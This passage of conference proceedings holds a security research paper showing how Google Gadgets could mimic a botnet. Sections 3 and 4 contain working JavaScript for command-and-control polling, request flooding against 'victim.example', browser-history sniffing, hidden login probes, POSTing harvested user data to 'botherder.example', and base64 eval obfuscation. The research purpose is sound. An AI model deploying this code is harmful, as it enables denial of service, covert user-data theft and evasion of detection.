Survivability Workshop ISW-2001/2002, Vancouver, BC Canada<br />
Winands, M.H.M. (2004) “Informed Search in Complex Games,” Datawyse b.v., Maastricht, The Netherlands.<br />
Jormakka, J. and Mölsä, J.V.E. (2005) “Modeling Information Warfare as a Game,” Journal of Information Warfare<br />
Vol. 4, No. 2, pp. 12-25.<br />
Kahneman, D. and Renshon, J. (2006) “Why Hawks Win.” Foreign Policy.<br />
http://www.foreignpolicy.com/articles/2006/12/27/why_hawks_win<br />
Libicki, M. (1995) What is Information Warfare? National Defense University, Washington, DC.<br />
McCormick, G. H. and Owen, G. (2006) "A Game Model of Counterproliferation, with Multiple Entrants,"<br />
International Game Theory Review, Vol. 8, No. 3, pp. 339-353.<br />
Moscaritolo, A. (2009) “Industry Collaboration: Drumming Up Defenses,” SC Magazine.<br />
MSNBC (2007) “Defense Dept. warns about Canadian spy coins,” [online],<br />
http://www.msnbc.msn.com/id/16572783/<br />
National Research Council Committee on Offensive Information Warfare (2009) “Technology, Policy, Law and<br />
Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities,” The National Academies Press,<br />
Washington, DC.<br />
http://www.abanet.org/natsecurity/cybersecurity_readings/1final_report_cyberattack_nasnae.pdf<br />
Prince, B. (2010) “Microsoft: U.S. Home to Most Botnet PCs,” eWeek [online]<br />
http://www.eweek.com/c/a/Security/Microsoft-US-Home-to-Most-Botnet-PCs-216614/<br />
Project Honey Pot, (2009) “Our 1 Billionth Spam Message” [online]<br />
http://www.projecthoneypot.org/1_billionth_spam_message_stats.php<br />
Report of the Defense Science Board (2010), “Capability Surprise,” [online],<br />
http://www.acq.osd.mil/dsb/reports/ADA506396.pdf<br />
Rescorla, E. (2004) “Is Finding Security Holes a Good Idea?” Third Workshop on the Economics of Information<br />
Security, Minneapolis, MN.<br />
Reuters (2010) “Wikileaks Battle: A New Amateur Face of Cyber War?” CNBC<br />
Rohde, K. (2005) Nonequilibrium Ecology. Cambridge University Press, Cambridge, UK.<br />
-- [online] “Games Theory (Nash Equilibria) in International Conflicts,” http://knol.google.com/k/games-theorynash-equilibria-in-international-conflicts#<br />
Saydjari, O.S. (2004) “Cyber Defense: Art to Science,” Communications of the ACM Vol. 47, No. 3 pp. 52-57.<br />
Schavland, J., Chan, Y., and Raines, R.A. (2009), “Information Security: Designing a Stochastic-Network for<br />
Throughput and Reliability.” Naval Research Logistics Vol. 56, No. 7, pp. 625-641.<br />
Shapcott, Brad “Economics Proverbs,” [online], CEO Magazine<br />
http://ceomagazine.biz/hrmproverbs/economicsproverbs.htm<br />
Shen, D., Chen, G., Haynes, L.S., Cruz, J.B., Kruger, M. and Blasch, E. (2007) “A Markov Game Approach to<br />
Cyber Security,” [online], SPIE Newsroom, https://spie.org/x15400.xml?ArticleID=x15400<br />
Schofield, J. (2008) “It’s Every Man for Himself,” The Guardian.<br />
Sills, M. (2009) “ULL gets Air Force contract: Researchers to develop preemptive cyber security strategies,” The<br />
Advocate [online] http://www.2theadvocate.com/news/79589152.html?c=1287843989513<br />
Soares, M. (2009) “Brazilian Blackout Traced to Sooty Insulators, Not Hackers,” Wired Magazine.<br />
Spring, B. “Nuclear Games: A Tool for Examining Nuclear Stability in a Proliferated Setting,” [online],<br />
http://www.heritage.org/Research/nationalSecurity/upload/hl_1066.pdf<br />
Umehara, E. and Ohta, T. (2009) “Using Game Theory to Investigate Risk Information Disclosure by Government<br />
Agencies and Satisfying the Public—the Role of the Guardian Agent," Systems, Man and Cybernetics, Part<br />
A: IEEE Transactions on Systems and Humans Vol. 39, No. 2, pp. 321-330.<br />
Verizon 2009 Data Breach Investigations Report, [online], Verizon Business Security Solutions,<br />
http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/<br />
Verizon 2010 Data Breach Investigations Report, [online], Verizon Business Security Solutions,<br />
http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf<br />
Wilson, C. (2008) “Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress”<br />
Congressional Research Service Order Code RL32114, Washington, DC.<br />
Woodward, P. (2010) “Stuxnet: the Trinity Test of Cyberwarfare,” War in Context [online]<br />
http://warincontext.org/2010/09/23/stuxnet-the-trinity-test-of-cyberwarfare/<br />
Zittrain, J., Lord, Lt. Gen. W., Geer, D., (2010) Cybercrime and Cyberwarfare class, Harvard Law School.<br />
Zittrain, J. (2008) The Future of the Internet—and How to Stop It. Yale University Press, New Haven, CT.<br />
-- (2009) “The Web as Random Acts of Kindness” [online video]<br />
http://www.ted.com/talks/jonathan_zittrain_the_web_is_a_random_act_of_kindness.html<br />
Who Needs a Botnet if you Have Google?<br />
Ivan Burke and Renier van Heerden<br />
Council for Scientific and Industrial Research, Pretoria, South Africa<br />
IBurke@csir.co.za<br />
RvHeerden@csir.co.za<br />
Abstract: Botnets have become a growing threat to networked operations in recent years. They disrupt services<br />
and communications of vital systems. This paper gives an overview of the basic anatomy of a Botnet and its<br />
modus operandi. We present a proof of concept of how Google gadgets may be exploited to<br />
achieve the basic components of a Botnet. We do not provide a full-fledged Botnet implementation but merely<br />
mimic its functionality through the Google Gadgets API. Our goal was to have Google act as a proxy agent to mask<br />
our attack sources, establish a Command and Control structure between Bots and Botherders, launch attacks and<br />
gather information, while at the same time maintaining some degree of stealth so as not to be detected by users.<br />
Keywords: Botnet; Google Gadget; Command and Control; DDoS<br />
1. Introduction<br />
A Botnet is a collection of compromised computers or agents that are infected by malware. These<br />
agents use sophisticated command and control techniques to execute complex and distributed<br />
network attacks. Agents are usually unaware that they have been compromised and are partaking in<br />
these attacks. They are often controlled by an external agent known as a Botherder or master agent<br />
(Banks 2007, Vamosi 2008).<br />
According to Stewart (in Vamosi, 2008), the techniques used by large Botnets such as Storm are<br />
available online, but a Botnet is more than the sum of its parts. What makes a Botnet successful is<br />
combining all these components into a coherent structure.<br />
Stracener (2008) states that future malware will run on the internet instead of<br />
standalone computers. His premise is that, as the modern computer infrastructure moves closer to a<br />
networked cluster or cloud, so too will the threats to these infrastructures. He warns about<br />
malicious gadgets and key vulnerabilities related to gadgets. A study conducted by WorkLight<br />
Inc. (in MacManus, 2008) found that 48% of internet bank users, ages 18-34, would use secure third-party<br />
Web 2.0 gadgets for their personal banking if their banks did not provide them with such<br />
functionality. This would imply that users are able to make an informed decision about what it<br />
means to identify a Web 2.0 gadget as being secure.<br />
Stracener's concerns are echoed by the Cloud Security Alliance (Hubbard et al.,<br />
2010), which identifies seven key threats to Cloud computing security:<br />
Abuse and nefarious use of cloud computing<br />
Insecure interfaces and APIs<br />
Malicious insiders<br />
Shared technology issues<br />
Data loss or leakage<br />
Account or service hijacking<br />
Unknown risk profile<br />
In this paper we demonstrate a rudimentary Botnet construct by exploiting Google services to host our Botnet. We investigate the core components of a Botnet and then attempt to mimic those components using the Google Gadgets API. The goal of this paper is not to illustrate the weaknesses of a specific API, but rather to illustrate the danger of user-generated content on the World Wide Web. Our aim is to prove that online services can be organized into a Botnet-like structure.
The Google Gadgets API is designed for rapid development of small web-based utility applications such as calendars, currency converters and news feed readers (Peterson, 2009). By adding the OpenSocial API to a Google gadget, one can enhance shared gadget interaction and extend the gadget into the social media domain.
Ivan Burke and Renier van Heerden<br />
Flaws in Google Gadgets have been demonstrated by Barth et al. (2009), who noted that JavaScript can lead to exploitation. These vulnerabilities range from session-sharing flaws that enable Cross-Site Scripting (XSS) and malicious redirects to Man-in-the-middle attacks. Google has been reluctant to fix some of these vulnerabilities since 2004 (Robert, 2008).
In Section 2, we investigate the composition of a basic Botnet. In Section 3, we describe our attempt at mimicking these components. In Section 4, we discuss our Botnet model. In Section 5, we propose possible future applications of this work. In Section 6, we present our conclusions and possible means of stopping these types of Botnets.
2. Anatomy of a botnet<br />
Botnets tend to share commonalities in their structure and design. In this Section, we describe the common components of a Botnet as well as their roles within the Botnet.
Figure 1: Anatomy of a Botnet<br />
2.1 Command and control component<br />
A large part of a Botnet's success can be attributed to its ability to execute large, synchronized, distributed attacks. This requires sophisticated command and control (C2) structures to coordinate these attacks (Banks 2007, Ollmann, 2009).
Communication channels usually relay herder instructions, such as commands to execute on a remote PC. Bots use these channels to send back retrieved data, such as key-logger information or command response information. These communications need to be covert in order to hide the Botnet's activities. Over the years, several covert channels have been used to communicate commands between Bot and Botherder, such as Twitter, Internet Relay Chat (IRC) and instant messaging. Advanced C2 techniques, such as steganography or the use of social media sites, hide Botnet communication in plain sight. Next we look at the types of attacks that can be executed by Botnets (Ollmann, 2009).
2.2 Attack vector<br />
Botnets are usually goal-oriented. For the most part their goal is either profit or service disruption. There are several means of achieving these goals using Botnets. In this Section, we discuss some attacks commonly used by Botnets.
2.2.1 Distributed denial of service attack<br />
Due to Botnets' size and distributed nature, Distributed Denial of Service (DDoS) attacks are a popular form of attack (Felix et al., 2005). In this attack the Botherder issues a command to all its subordinate Bots to connect to a targeted system at the same time. The targeted system usually cannot handle the sudden influx of requests, which causes its services to be temporarily disrupted. Botherders rent out this capability to businesses seeking to disrupt their competitors' services (Kiefer, 2004).
2.2.2 Spam relay<br />
The first generation of Botnets was reliant on email to spread and infect hosts. These Botnets would open a SOCKS v4/v5 proxy on compromised machines, allowing them to send spam at the request of the Botherder. Botnets also harvested email addresses from infected hosts to add to their spam lists (Engate, 2009).
2.2.3 Data harvesting<br />
Botnets report valuable system information back to Botherders. This information can include keystroke logs, system vulnerabilities, service availability on the host machine, open port data and network traffic. Botherders collect and collate this data to retrieve information such as user names and passwords, which can be used for mass identity theft. Botnets scan for system weaknesses that could be exploited at a later stage, should the Botnet's current functionality be compromised. By sniffing network traffic, a Botnet can become aware of rival Botnets infecting its host PCs and disrupt those rivals' functionality.
2.2.4 Ad serve abuse<br />
Botnets can also be utilized for monetary gain, by exploiting the Pay-Per-Click or impression-based internet advertising models. By forcing infected machines onto ad-serving sites, or by using iFrames to fool users into clicking on advertisements, Botherders can generate revenue from marketing companies.
Botherders infect host PCs with browser add-ons, Browser Helper Objects (BHOs) or browser extensions which change the user's browser interaction to redirect them to ad-serving sites, or which simply generate browser requests to ad-serving sites automatically. These add-ons can serve a dual purpose, as they can also collect user data from the browser and relay it to the Botherder.
2.3 Viral capability<br />
One of the great strengths of a Botnet is its sheer size, which is also what makes Botnets so difficult to take down. It is therefore essential for a Botnet to spread quickly and to widely distributed systems.
The first generation of Botnets was primarily reliant on email and malicious page redirects to spread. Modern Botnets such as Asprox, Koobface, Zhelatin and Kreios C2 spread via social media (Denis, 2008; Eston, 2010). The Botnet posts content on social network sites in the user's name, which infects any user who follows the malicious links. Some Botnets have been known to hide within popular trusted applications: Trojans drop malicious code into trusted address spaces and exploit weaknesses in the host PC to compromise it and make it part of the Botnet.
2.4 Stealth component<br />
Botnets are only useful as long as they are not detected. Hence stealth is a fundamental requirement<br />
for all Botnets.<br />
It is the opinion of the researchers that stealth is required in each of the components previously identified in this Section. If communications are noisy, the infected host might become aware of malicious activity, and firewalls or intrusion detection systems might block the communications. If an attack is too disruptive, anti-virus companies will detect and block it. The mechanisms used to spread a Botnet must seem organic and natural to be effective. It is the combination of these requirements that makes Botnets so difficult to construct and maintain.
In the next Section we describe our attempt at constructing these components using the Google Gadgets API.
3. Attempt at constructing a botnet
In this Section, we discuss our attempt to create a proof-of-concept Botnet. First we look at cloud computing as a whole; then, using the Google Gadgets API, we investigate the possibility of using Cloud computing to mimic the attack components of a Botnet as presented in Section 2. It is important to note that this paper is not specifically targeted at exposing Google API weaknesses, but at illustrating the dangers of user-generated content and cloud computing on the World Wide Web.
According to Gartner (Gartner, 2008), cloud computing can be defined as a style of computing whereby IT-related capabilities are provided as a service, using Internet technologies to connect to multiple customers. Botnets have already been found using popular cloud services such as Amazon's EC2 as a Command and Control unit (Goodin, 2009). In a report compiled by the Cloud Security Alliance, seven types of security threat were identified (Hubbard et al., 2010). Of these seven, we focused on two main attack vectors: abuse and nefarious use of cloud computing, and insecure interfaces and APIs.
3.1 Establishing denial of service attack capability<br />
Figure 2: Google Gadget makeRequest() function<br />
The Google Gadgets API provides users with the capability to load remote content into gadgets by calling makeRequest() (Google Gadgets API, 2009). This function is asynchronous and can be called independently of other JavaScript calls. This is a useful capability, as it allows users to easily create gadget versions of their websites and extend their market reach. The function instructs one of the servers residing in the Google Gadget domain to perform an HTTP request on behalf of the gadget user, as illustrated in Figure 3. This implies that the request source is obfuscated and that only the Google Gadget server's IP address will appear in the remote server's logs. By exploiting this communication structure, one can use Google Gadget servers as Bots for a Botnet. For the purpose of this Proof of Concept we used Google's makeRequest() function to send and interpret all command and control messages exchanged between Bots and Botherder.
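As a sketch of this C2 pattern (not the authors' exact code): `BOTHERDER_URL` and the one-line "verb target" command format are hypothetical assumptions, while `gadgets.io.makeRequest` is the documented Gadgets API call.

```javascript
// Hypothetical C2 polling loop for a gadget. gadgets.io.makeRequest fetches
// remote content via Google's servers, so only Google's IP address appears
// in the remote server's logs.
var BOTHERDER_URL = "http://example.com/commands.txt"; // hypothetical

function pollForCommands() {
  var params = {};
  params[gadgets.io.RequestParameters.CONTENT_TYPE] = gadgets.io.ContentType.TEXT;
  // Ask a Google Gadget server to fetch the command file on our behalf.
  gadgets.io.makeRequest(BOTHERDER_URL, handleCommands, params);
}

// Commands are assumed to be "verb target" pairs (hypothetical format).
function parseCommand(text) {
  var parts = text.trim().split(/\s+/);
  return { verb: parts[0], target: parts[1] };
}

function handleCommands(response) {
  var cmd = parseCommand(response.text);
  if (cmd.verb === "fetch") {
    // Relay the attack request through Google's servers as well.
    gadgets.io.makeRequest(cmd.target, function () {}, {});
  }
}
```

Because the gadget re-fetches its command file on a timer, the Botherder can retask every Bot by editing a single hosted file.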
Figure 3: makeRequest() HTTP request flow<br />
According to Google Webmaster Central (2010), Google uses a Feedfetcher user-agent to retrieve remote content. Google's Feedfetcher user-agent does not follow the Robots Exclusion Protocol. This protocol is not mandatory, but is meant to protect certain pages from being viewed by web spiders and crawlers. When asked why the Feedfetcher agent does not obey robots.txt, a Google representative stated that a Feedfetcher request is the result of an explicit action by a human user rather than an automatic crawler, and hence Feedfetcher does not follow robots.txt guidelines. This response would imply that it is not possible to generate fetch requests automatically; yet, seeing as Google gadgets are coded in JavaScript, it is a trivial task to automate the fetch requests.
According to Google Gadgets API (2009), Google's makeRequest() function does not validate the existence of a page prior to sending the HTTP request to the remote server. This means malicious coders can use Google Gadgets to probe websites for config, admin or script files stored in un-listable directories of web pages. It can also be used to create a large amount of traffic towards a web server by generating makeRequest() calls for non-existent pages on the server. This type of probing and traffic generation could also be achieved in pure JavaScript without the Google Gadgets makeRequest() function, but the benefit of using the Google Gadgets API is that the remote server's logs will only contain the IP addresses of Google Gadget application servers, as illustrated by Figure 4.
Figure 4: Remote server log<br />
Google provides a caching feature for all its gadgets to reduce server load (Google Gadgets API, 2009). The cache server saves a copy of the remote content on a local server for faster retrieval. By default, Google gadgets are cached for approximately one hour. Because some gadget developers need shorter cache timings due to the dynamic nature of their gadgets, Google gives developers the capability to set the cache interval. According to Google Gadgets API (2009), it is possible to set the interval to zero seconds. The API does not prevent developers from setting the cache interval to zero, but warns against doing so as it might overload the remote server.
We have thus identified two means of disrupting a remote server: generating requests for a near-infinite number of fictitious web pages on the server, or fetching the same page repeatedly with the cache interval set to zero seconds.
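Both techniques can be sketched in a few lines of gadget JavaScript; the target URL below is hypothetical, and `gadgets.io.RequestParameters.REFRESH_INTERVAL` is the documented parameter for controlling the gadget cache interval.

```javascript
var TARGET = "http://victim.example/"; // hypothetical target server

// Build a URL for a random, almost certainly non-existent page: makeRequest()
// does not check that the page exists before issuing the HTTP request.
function randomPageUrl(base) {
  return base + "page_" + Math.floor(Math.random() * 1e9) + ".html";
}

function floodTarget(requestCount) {
  var params = {};
  // A refresh interval of zero disables caching, so every call reaches the server.
  params[gadgets.io.RequestParameters.REFRESH_INTERVAL] = 0;
  for (var i = 0; i < requestCount; i++) {
    gadgets.io.makeRequest(randomPageUrl(TARGET), function () {}, params);
  }
}
```

Randomizing the page name defeats the cache as well, since each URL is seen for the first time.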
3.2 Retrieving user data<br />
Clients using the Cloud use API calls to communicate with and execute commands on the Cloud through its Service-Oriented Architecture (SOA). In general, cloud computing units are heavily compartmentalized to ensure no data can be leaked between clients. Unfortunately, the components that make up the Cloud infrastructure, such as CPU, RAM and GPU, were not specifically designed for isolation (Hubbard et al., 2010). Techniques to exploit this weakness have been demonstrated by Joanna Rutkowska (Rutkowska, 2008) and Kostya Kortchinsky (Kortchinsky, 2009). In our specific case we do not target data on the Cloud itself; we merely use the Cloud as a channel to pass and receive messages.
The Google Gadgets API is a collection of JavaScript libraries; as such, it requires JavaScript to be enabled in order to function. JavaScript can be used to determine the user's browser history and browser information. Cabri (2007) created a simple JavaScript function to determine whether a page has been visited before; Figure 5 contains the script he used. By using this script to look up banking sites or social media sites, one can determine which banking and social media services the user has visited.
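A minimal reconstruction of the idea behind such history-sniffing scripts follows; the function name matches the one obfuscated in Figure 6, but the colour value and URL list are assumptions. Note that modern browsers deliberately report identical styles for :visited links, so this 2010-era technique no longer works.

```javascript
// History sniffing via :visited styling (sketch). Assumes the page's
// stylesheet contains: a:visited { color: rgb(255, 0, 0); }
function hasLinkBeenVisited(url) {
  var link = document.createElement("a");
  link.href = url;
  document.body.appendChild(link);
  // In 2010-era browsers the computed colour leaked visited state.
  var color = window.getComputedStyle(link, null).color;
  document.body.removeChild(link);
  return color === "rgb(255, 0, 0)";
}

// Scan a targeted list of banking/social media URLs (hypothetical examples).
function scanHistory(urls) {
  return urls.filter(hasLinkBeenVisited);
}
```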
By combining this script with Google's makeRequest(), one can determine whether the user has auto-login enabled for certain social media sites. For example, to test whether the user has auto-logon enabled on Facebook, one can request http://www.facebook.com/home.php. If the content is the home page, the browser automatically logged the user in or the user has an active Facebook session. If the login page is returned, the user's session has expired or auto-logon is disabled. Keep in mind that makeRequest() does not display the page; it merely returns its contents to the callback function specified in the makeRequest() call. This means the user need not receive any visual cues of gadget activity. The Botnet designer can choose whether to scrape the resulting home page for more data, crawl the social network site further, or simply report the information back to the Botherder for future use.
Figure 5: Sites visited script<br />
Hashemian (2005) created a PHP script that can be accessed via JavaScript to perform IP resolution and reverse DNS lookups for visitors to a site. This provides more information on the location and domain usage of the gadget user. Google's makeRequest() function is also capable of performing a POST request. By combining these JavaScript information-gathering techniques with the POST capability of Google's makeRequest(), one can report the gathered information back to the Botherder. This is only some of the data that can be gathered using JavaScript, and by no means covers everything that JavaScript can harvest, but for the purposes of this Proof of Concept it is sufficient.
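The reporting step can be sketched as follows; `REPORT_URL` is a hypothetical collection point, while the `METHOD` and `POST_DATA` request parameters are part of the documented makeRequest() interface.

```javascript
var REPORT_URL = "http://botherder.example/report"; // hypothetical

// Serialise harvested fields as a standard form-encoded body.
function encodeReport(data) {
  var pairs = [];
  for (var key in data) {
    pairs.push(encodeURIComponent(key) + "=" + encodeURIComponent(data[key]));
  }
  return pairs.join("&");
}

// POST the harvested data back through Google's servers, so the collection
// point never sees the gadget user's own IP address in its logs.
function reportBack(data) {
  var params = {};
  params[gadgets.io.RequestParameters.METHOD] = gadgets.io.MethodType.POST;
  params[gadgets.io.RequestParameters.POST_DATA] = encodeReport(data);
  gadgets.io.makeRequest(REPORT_URL, function () {}, params);
}
```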
3.3 Adsense abuse<br />
Advertising companies offer website designers money for serving up adverts on their sites. By requesting pages using makeRequest(), one can fool most impression-based advertising models into counting the page fetch as an impression, thereby generating revenue for the website designer. Unique IP addresses carry a higher weight in advanced impression-based advertising schemes; because Google Gadget application servers make the requests, only a select few IP addresses will appear in the advertising company's logs. Hence, AdSense abuse is not particularly effective with the Google Gadgets API, but it does guarantee a steady and constant number of visits to a site.
3.4 Obfuscating source of attack<br />
As stated above, if the Google Feedfetcher is used to fetch remote data, only the Google Gadget domain server's IP will be logged in the remote server's access logs. This is already an attempt to obfuscate the source of the attack. Unfortunately, for Google gadgets to work and be published, Google needs access to the gadget source code. This means that anyone wishing to add the gadget would also be able to fetch the source code and could possibly deduce that it executes malicious commands. A simple way of overcoming this obstacle is to obfuscate the source code, for example by encoding the JavaScript source in base64. Wang (2009) developed a web tool specifically designed to obfuscate JavaScript. Figure 6 illustrates the result of obfuscating the hasLinkBeenVisited() function.
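The base64 step alone can be sketched as a one-line wrapper; `btoa`/`atob` are the browser's base64 encode/decode functions, and a dedicated obfuscator such as Wang's (2009) additionally renames identifiers.

```javascript
// Wrap a script body so that it ships base64-encoded and is decoded and
// executed only at run time, hiding the plain-text source from casual review.
function obfuscate(source) {
  return "eval(atob('" + btoa(source) + "'))";
}
```

For example, `obfuscate("alert(1)")` yields a string whose payload is unreadable until `atob()` runs in the user's browser.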
Figure 6: JavaScript obfuscation<br />
3.5 Spreading of botnet<br />
Thus far we have illustrated two layers of attack. The DDoS attacks and AdSense abuse described in the previous subsections are targeted at remote servers or impression-based advertising companies; these attacks are in effect performed by the gadget users on behalf of the Botherder. The second layer of attack is the data gathering performed on the actual gadget user.
Attacks on remote servers actually require few gadget users, since a Botherder can automate mass amounts of requests from a single gadget user. FeedFetcher was designed to be distributed across several machines to improve performance, and to cut down on bandwidth Google attempts to make the fetch request from a machine situated near the target site. This means that the IP address constantly changes and that the physical location of the fetching machines also varies.
The second layer of attack is more reliant on the gadget itself spreading among users. For the purposes of this research we merely created several Google accounts and used the Google Gadget sharing capabilities to distribute the gadgets. We now briefly discuss some of the options available for spreading gadgets.
The Google Gadgets API provides users with the capability of sharing gadgets with a user's Google contact list, or of sending out emails containing an invitation to install the gadget. Google also provides the capability of publishing the gadget on its application servers. Published applications can be ranked and browsed by all iGoogle users; by manipulating the Google ranking system, one can increase the probability of one's gadget being added by other users.
The Google Gadgets API is fully integrated with the OpenSocial API, a web framework for developing social applications capable of communicating across multiple social media sites. Peterson (2009) provides some basic steps that can be taken to increase gadget spread.
In the next Section, we discuss our final Botnet model and how we mapped all the techniques described in this Section into our final Proof of Concept.
4. Botnet gadget<br />
Figure 7 illustrates the basic structure of our Botnet gadget. The Botherder acts as a gadget developer and uses Google's services to update the gadget and, by extension, the Botnet. In this way the Botherder has a single point of access to all Bots at the same time. Updates might include new JavaScript attacks or new targets for a DDoS attack. The Botnet hides in plain sight as a normal gadget. It can use either a command from the Botherder or a temporal event to trigger a remote attack, and while waiting to commence the next attack, the gadgets can gather information on gadget users and possibly identify other means of communication or vulnerabilities on the gadget user's PC.
Figure 7: Botnet Gadget<br />
In the remainder of this Section we discuss the attacks we added to our PoC Botnet Gadget and we<br />
discuss some of the information obtained by our Botnet Gadget.<br />
We used the JavaScript function provided by Cabri (2007) to extract user history information, such as which social network sites the gadget user has visited and which bank he or she uses. Cabri's (2007) script can only determine whether a given site has been visited, making this an exhaustive search, so we scanned through a targeted list of URLs for the information we were interested in. We used the JSON IP address recovery script provided by Bullock (2010) to determine the gadget user's IP address, time zone and general geographical location from the retrieved IP.
Figure 8: Sample of JSON IP recovery script<br />
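As a sketch of consuming such a geolocation response (the JSON field names below are assumptions about the service's format, not verified against ipinfodb):

```javascript
// Parse a geolocation JSON response into the fields the gadget reports back.
// Field names (Ip, TimezoneName, CountryName) are assumed, not verified.
function parseGeo(jsonText) {
  var geo = JSON.parse(jsonText);
  return { ip: geo.Ip, timezone: geo.TimezoneName, country: geo.CountryName };
}
```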
To determine whether the gadget user has auto-login enabled for social network sites, we created hidden iFrames to try to access logged-in content of social media sites. We queried the iFrame content to determine whether the iFrame was redirected to a login page or whether it could access the content. This data, along with the IP and history data, was posted back to our own remote server using Google's makeRequest() function.
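The iFrame probe can be sketched as follows; the login-page marker string is a hypothetical example (a real probe would check site-specific markup), and same-origin restrictions mean the frame content is not always readable.

```javascript
// Decide whether fetched markup looks like a logged-in page rather than a
// login form (the "login_form" marker is a hypothetical example).
function looksLoggedIn(html) {
  return html.indexOf("login_form") === -1;
}

function probeAutoLogin(url, onResult) {
  var frame = document.createElement("iframe");
  frame.style.display = "none"; // keep the probe invisible to the user
  frame.src = url;
  frame.onload = function () {
    var loggedIn = null; // null: content not readable (cross-origin)
    try {
      loggedIn = looksLoggedIn(frame.contentDocument.body.innerHTML);
    } catch (e) { /* cross-origin access denied */ }
    onResult(url, loggedIn);
  };
  document.body.appendChild(frame);
}
```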
For a denial of service attack, we used one of our own servers and requested fictitious pages from it using the makeRequest() function. We placed the fetch request in an endless loop that generated randomized page requests to our server. This approach was not successful, as it led the gadget user's PC to run out of memory. Upon investigation we realized this was caused by Google's AdSense triggering upon each remote request. We realized that by slowing the request rate one could effectively use this technique for AdSense abuse, but as this was not our goal with this PoC we deactivated AdSense tracking.
We ran the DDoS attack ten times against our own server, using a single Google Gadget machine. Table 1 shows that on average 638 requests were executed per second. According to the server logs, eight unique Google domain servers were used to make the remote requests. Based on this data, together with data about a specific target server, one can estimate the number of gadget users required to effectively take down a remote server. There is no fixed number of gadget users required to disrupt a service; the number depends on server architecture, request routing and the data transferred per request. This PoC merely determined the rough number of requests that are possible using Google gadgets.
Table 1: DDoS results<br />
Experiment    Time per 1000 requests (seconds)    Requests per second
1 1.376 726.744<br />
2 1.884 530.786<br />
3 1.232 811.688<br />
4 1.473 678.887<br />
5 1.661 602.047<br />
6 1.573 635.768<br />
7 1.589 629.406<br />
8 1.605 623.169<br />
9 1.621 617.055<br />
10 1.637 611.060<br />
Average 1.56495 638.998<br />
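A back-of-the-envelope sizing based on Table 1 can be computed as follows; the server capacity figure in the usage example is a made-up illustration, and only the 638.998 requests/second average comes from the table.

```javascript
// Average request rate measured per Google Gadget machine (Table 1).
var REQUESTS_PER_SECOND_PER_USER = 638.998;

// Rough number of gadget users needed to saturate a server, given the request
// rate at which that server's service degrades (architecture-dependent).
function gadgetUsersNeeded(serverCapacityRps) {
  return Math.ceil(serverCapacityRps / REQUESTS_PER_SECOND_PER_USER);
}
```

For example, a hypothetical server that saturates at 50,000 requests per second would need roughly 79 gadget users.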
5. Future work<br />
This paper merely wishes to illustrate the ease of generating a potential Botnet using the services provided by Google Gadgets. In actuality, the only true exploit was the fact that Google allows users to use Google servers to fetch remote content. The fact that Google gadgets require JavaScript in order to run merely facilitates the process of automating the attack.
The whole spectrum of attacks on JavaScript can be used with Google’s services. The ability to<br />
execute code from Google’s computers can lead to other misdirection attacks. Google is not the only<br />
commercial player in the internet cloud space. Similar attacks may be possible from Microsoft, Yahoo<br />
or Amazon services. We aim to investigate this in future research.<br />
In this paper we did not investigate the possibility of AdSense revenue generation. By registering with an impression-based advertising mechanism such as Adgator, one can generate revenue simply by slowing down a Botherder's repetitive fetch requests. More complex techniques for abusing clickthrough or Pay-Per-Click advertising schemes are proposed by Hansen (2008).
The Botnet gadget suffers from several critical weaknesses. Because it relies on the Google Feedfetcher agent to make remote requests, it can easily be stopped by blocking all requests from this agent; however, this will also affect legitimate Feedfetcher requests, such as those from Google Reader. Another potential weakness is that the gadget source code needs to be accessible by Google Gadget servers, so if a malicious gadget is detected, Google can easily remove the gadget and the Botherder will lose all its Bots.
6. Conclusion<br />
In this paper we reiterated the views of Stracener (2008) and Hubbard et al. (2010) that as the computer user base moves towards cloud computing, so too will the security threats. We used Hubbard's seven key threat indicators to identify possible routes of attack for our research.
First, we defined the four key components of a Botnet. We then provided examples of how these components can be mimicked by Cloud services, and specifically by Google's Gadgets API, and how they match the Cloud security threats identified by Hubbard. The API was capable of reproducing each component's functionality, to a limited degree, with very little alteration of freely available web resources.
We combined these components to form a simple but working Botnet. Although limited in scope, a simple DDoS attack was achieved by using Google servers as the attacking computers. Current Botnets concentrate on using personal and corporate computers, but as these move into cloud computing, the Botnets will follow.
We identified several weak points in our current design and identified some possible areas for future<br />
development of Cloud botnet research. This is still a rather new field and as such this paper hopes to<br />
serve as a possible point of reference for future work.<br />
References<br />
Banks, S. & Stytz, M., 2007. Bot armies: an introduction. [Online] SPIE. Available at: http://spie.org/x15000.xml?ArticleID=x15000 [Accessed 10 October 2010].
Bullock, D., 2010. IP Address Geolocation JSON API. [Online] Available at:<br />
http://ipinfodb.com/ip_location_api_json.php [Accessed 8 October 2010].<br />
Cabri, R., 2007. Spyjax - Your browser history is not private! [Online] Available at:<br />
http://www.techtalkz.com/news/Security/Spyjax-Your-browser-history-is-not-private.html [Accessed 7<br />
October 2010].<br />
Denis, B., 2008. Anatomy of the Asprox Botnet. [Online] VeriSign Available at:<br />
http://xylibox.free.fr/AnatomyOfTheASPROXBotnet.pdf [Accessed 30 September 2010].<br />
Engate, 2009. Defending your network from Botnet threat. [Online] Engate Available at:<br />
http://ns1.happynet.com/images/datasheets/Engate_whitepaper.pdf [Accessed 9 October 2010].<br />
Eston, T., 2010. DigiNinja. [Online] Available at: http://www.digininja.org/ [Accessed 5 October 2010].<br />
Freiling, F.C., Holz, T. & Wicherski, G., 2005. Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks. Computer Security – ESORICS 2005, 3679, pp. 319-335.
Gartner, 2008. Gartner Says Cloud Computing Will Be As Influential As E-business. Stamford: Gartner Inc.
Google Gadgets API, 2009. Working with Remote Content. [Online] Google Available at:<br />
http://code.google.com/apis/gadgets/docs/remote-content.html [Accessed 7 October 2010].<br />
Google Webmaster Central, 2010. Feedfetcher. [Online] Google. Available at: http://www.google.com/support/webmasters/bin/answer.py?hl=en&answer=178852 [Accessed 3 October 2010].
Hansen, R. & Stracener, T., 2008. Xploiting Google Gadgets: Gmalware and beyond. [Online] Available at:<br />
http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-stracener-hansen.pdf [Accessed 3<br />
October 2010].<br />
Hashemian, R.V., 2005. JavaScript Visitor IP Address and Host Name. [Online] Available at: I:\JavaScript Visitor<br />
IP Address and Host Name.mht [Accessed 3 October 2010].<br />
Hubbard, D. et al., 2010. Top Threats to Cloud Computing V1.0. Cloud Security Alliance.<br />
